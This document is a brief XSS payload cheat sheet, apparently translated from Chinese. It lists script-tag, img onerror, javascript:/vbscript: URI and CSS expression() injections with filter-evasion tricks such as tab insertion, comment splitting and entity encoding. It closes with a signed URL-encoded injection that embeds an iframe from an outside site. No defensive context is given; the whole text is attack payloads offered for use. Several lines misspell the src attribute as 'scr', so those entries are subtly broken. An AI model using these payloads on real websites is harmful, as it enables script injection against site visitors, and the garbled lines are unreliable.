<script>alert("跨站")</script> (most commonly used)
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (whitespace inserted with the Tab key)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity <div style={left:&#x0065;xpression (alert('xss'))}></div>
unicode <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["